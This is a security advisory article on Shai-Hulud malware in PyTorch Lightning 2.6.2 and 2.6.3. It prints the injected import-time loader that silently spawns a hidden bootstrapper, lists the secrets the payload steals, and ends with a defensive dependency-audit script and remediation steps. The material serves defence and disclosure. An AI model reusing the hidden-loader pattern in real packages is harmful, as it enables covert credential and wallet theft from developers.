
Shai-Hulud Malware Worms Its Way Into PyTorch Lightning — AI Developers' Credentials at Risk

PyTorch Lightning versions 2.6.2 and 2.6.3 contain Dune-themed malware that steals developer credentials — the latest escalation in AI supply chain attacks.

Tags: Cybersecurity, Supply Chain Attack, PyTorch, AI Development, Malware

The Shai-Hulud malware campaign — named after the sandworms of Dune — has crawled from npm into Python territory. Versions 2.6.2 and 2.6.3 of the lightning package on PyPI, the widely-used framework for training PyTorch models, contain malicious code that silently steals developer credentials, cloud secrets, and cryptocurrency wallets.

If you’re using either of those versions, treat your machine as compromised. This isn’t a theoretical risk. It’s a very real, very thorough data theft operation that’s been running inside one of the most popular machine learning frameworks on the planet.

How It Works

The attack is surgical. Malicious code injected into __init__.py — the file that runs the moment you import the package — spawns a background thread before any legitimate Lightning code loads:

import os
import subprocess
import sys
import threading

def _run_runtime() -> None:
    # Resolve the bundled "_runtime/start.py" bootstrapper shipped next to this __init__.py
    _runtime_dir = os.path.join(os.path.dirname(__file__), "_runtime")
    _start = os.path.join(_runtime_dir, "start.py")
    if os.path.exists(_start):
        # Launch it as a separate process, discarding its output so nothing
        # surfaces in the importing program
        subprocess.Popen(
            [sys.executable, _start],
            cwd=_runtime_dir,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )

# Daemon thread: the import returns immediately and the bootstrapper runs unnoticed
threading.Thread(target=_run_runtime, daemon=True).start()

The start.py bootstrapper then downloads the Bun JavaScript runtime (v1.3.13) and executes an 11MB payload called router_runtime.js. This is the same pattern used in the Bitwarden CLI and SAP npm compromises earlier in the campaign — same attacker, same worm, now crossing from npm to PyPI.

What It Steals

This is where it gets genuinely alarming. The malware doesn’t just grab API keys — it hoovers up everything:

  • SSH keys and shell histories (bash, zsh, Python, Node, MySQL, psql)
  • Environment files (.env) — the universal config format that holds everything
  • Git credentials
  • Cloud credentials — AWS, GCP, Azure
  • Kubernetes and Helm configs
  • Docker credentials
  • npm tokens
  • MCP configs (Model Context Protocol — used by AI coding assistants like Cursor and Claude Code)
  • Cryptocurrency wallets — Bitcoin, Litecoin, Monero, Dogecoin, Dash, Exodus, Atomic, and Ledger
  • VPN credentials — NordVPN, ProtonVPN, CyberGhost, Windscribe, OpenVPN
  • Discord and Slack session data

All stolen data is RSA-2048 encrypted before exfiltration to public GitHub repositories, making it harder to detect and intercept.

The inclusion of MCP configs is particularly notable. If you’re using an AI coding assistant like Cursor or Claude Code, the malware grabs the configuration files that tell those tools which servers you trust and what permissions you’ve granted. That’s not opportunistic — that’s targeting the AI development workflow specifically.

A Campaign, Not an Incident

This is the third confirmed attack in the Shai-Hulud campaign:

  1. Bitwarden CLI npm package (April 23) — password manager compromised
  2. SAP npm packages (April 29) — enterprise software supply chain
  3. PyTorch Lightning PyPI package (April 30) — AI training framework

The attacker is methodically targeting high-value, widely-installed packages in the developer ecosystem. Each attack uses the same infrastructure: a Bun-based bootstrapper that downloads the payload from GitHub. Each attack steals broadly and encrypts before exfiltration.

This isn’t a proof of concept. This is operational malware that’s been running in production environments.

Why It Matters for NZ

PyTorch Lightning is used by AI researchers, startups, and enterprises worldwide — including in New Zealand. Any NZ organisation running machine learning workloads that pulled lightning==2.6.2 or 2.6.3 between when those versions were published and when they were pulled is potentially affected.

This includes:

  • University research groups training models on local HPC clusters
  • AI startups building products on PyTorch
  • Enterprise data science teams running training pipelines
  • Cloud workloads on AWS, GCP, or Azure where credentials could have been exfiltrated

The NZ-specific concern isn’t just the malware itself — it’s the follow-on risk. Stolen cloud credentials can be used to spin up cryptocurrency mining operations, access sensitive data, or pivot into other parts of an organisation’s infrastructure. If your AWS credentials were in an .env file on a machine that imported the compromised Lightning versions, you should assume they’re compromised regardless of whether you’ve found evidence of unauthorised access.

What to Do

Immediate actions:

  1. Check your dependencies: pip show lightning — if you see version 2.6.2 or 2.6.3, assume the machine is compromised
  2. Pin to safe versions: pip install lightning==2.6.1 or earlier
  3. Rotate ALL credentials that were on the affected machine — SSH keys, cloud API keys, database passwords, npm tokens, everything
  4. Check GitHub for any repositories you don’t recognise that might be receiving exfiltrated data
  5. Review access logs for cloud accounts for any unauthorised activity

Longer term:

  • Use dependency pinning and hash verification in your CI/CD pipelines
  • Consider tools like Aikido’s Safe Chain that intercept package installs and check them against threat intel before installation
  • Audit your supply chain regularly — this attack was caught by security researchers, not by the package maintainers
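The following is an added example, not code from the article or from the PyTorch Lightning project. It turns the "check your dependencies" and "pin with hash verification" advice above into a small gate a CI job or a local audit could run: it flags requirement pins of lightning 2.6.2 or 2.6.3, flags any pin that carries no --hash (so pip's --require-hashes mode could not be used), and checks a package directory for the _runtime/start.py bootstrapper that the injected __init__.py shown earlier spawns. The sample requirements text, the placeholder digest and the throwaway package directories are constructed; the indicator path is taken from the snippet on this page, and the live-environment check uses only the standard importlib.metadata API.

```python
"""Supply-chain gate for the Lightning compromise described above.

Added example (not from the article or the Lightning project). It
(1) flags requirement pins of lightning==2.6.2 / 2.6.3,
(2) flags pins without a --hash, which `pip install --require-hashes` would reject,
(3) checks a package directory for the `_runtime/start.py` bootstrapper the
    injected __init__.py launches.
Sample inputs below are constructed.
"""
from __future__ import annotations

import re
import tempfile
from importlib import metadata
from pathlib import Path

COMPROMISED = {("lightning", "2.6.2"), ("lightning", "2.6.3")}  # versions named in the article
INDICATOR = Path("_runtime") / "start.py"  # bootstrapper path from the injected __init__.py

PIN_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([0-9][A-Za-z0-9.!+-]*)")


def parse_pins(text: str) -> list[tuple[str, str, bool]]:
    """Return (name, version, has_hash) for every '==' pin in requirements-style text.

    Backslash continuations are joined first, because pip-compile writes each
    --hash on its own continued line.
    """
    joined = text.replace("\\\n", " ")
    pins = []
    for raw in joined.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        m = PIN_RE.match(line)
        if m:
            name = m.group(1).lower().replace("_", "-")  # normalise package name
            pins.append((name, m.group(2), "--hash=sha256:" in line))
    return pins


def audit_requirements(text: str) -> dict[str, list[str]]:
    """Gate logic: which pins are known-compromised, and which are not hash-locked."""
    compromised, unhashed = [], []
    for name, version, has_hash in parse_pins(text):
        spec = f"{name}=={version}"
        if (name, version) in COMPROMISED:
            compromised.append(spec)
        if not has_hash:
            unhashed.append(spec)
    return {"compromised": compromised, "unhashed": unhashed}


def has_runtime_indicator(package_dir: Path) -> bool:
    """True if the on-disk bootstrapper the malicious __init__.py spawns is present."""
    return (package_dir / INDICATOR).is_file()


def check_installed_lightning() -> dict:
    """Inspect the live environment: installed version and indicator file, if any."""
    try:
        dist = metadata.distribution("lightning")
    except metadata.PackageNotFoundError:
        return {"installed": False}
    pkg_dir = Path(dist.locate_file("lightning"))  # top-level package directory
    return {
        "installed": True,
        "version": dist.version,
        "compromised_version": ("lightning", dist.version) in COMPROMISED,
        "indicator_present": has_runtime_indicator(pkg_dir),
    }


def simulate_indicator_scan() -> tuple[bool, bool]:
    """Build two throwaway package dirs (constructed, empty files) to exercise the check."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = Path(tmp) / "clean" / "lightning"
        clean.mkdir(parents=True)
        (clean / "__init__.py").touch()
        infected = Path(tmp) / "infected" / "lightning"
        (infected / "_runtime").mkdir(parents=True)
        (infected / "__init__.py").touch()
        (infected / "_runtime" / "start.py").touch()  # the indicator, as an empty file
        return has_runtime_indicator(clean), has_runtime_indicator(infected)


# Constructed sample: one hash-locked pin (placeholder digest, not a real hash)
# and one bare pin of a compromised version.
SAMPLE_REQUIREMENTS = """\
torch==2.3.0 \\
    --hash=sha256:PLACEHOLDER_NOT_A_REAL_DIGEST
lightning==2.6.2   # pulled in without a hash
"""

if __name__ == "__main__":
    print(audit_requirements(SAMPLE_REQUIREMENTS))
    print(simulate_indicator_scan())
    print(check_installed_lightning())
```

Run it in the environment you want to audit; a non-empty "compromised" list or an indicator hit means the rotation steps in the immediate-actions list apply, and a non-empty "unhashed" list is the gap that hash-verified installs would close.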

The Bigger Problem

The Shai-Hulud campaign is exploiting a fundamental weakness in how modern software is built. Open source packages are maintained by volunteers and small teams. Package registries like PyPI and npm have limited resources for vetting. And the development ecosystem has made it normal to install hundreds of dependencies you’ve never audited.

PyTorch Lightning has over 10,000 GitHub stars and is used by thousands of organisations. It’s not some obscure package. If this can happen to Lightning, it can happen to anything.

The AI ecosystem is particularly vulnerable because it sits at the intersection of cutting-edge research and startup-speed development. Researchers and engineers are installing packages quickly, iterating fast, and not always checking what they’re pulling in. The Shai-Hulud attacker understands this — that’s why they’re targeting AI tools specifically.

The sandworm is in the spice. Time to check your dependencies.


Sources

Aikido Security, Endor Labs, Semgrep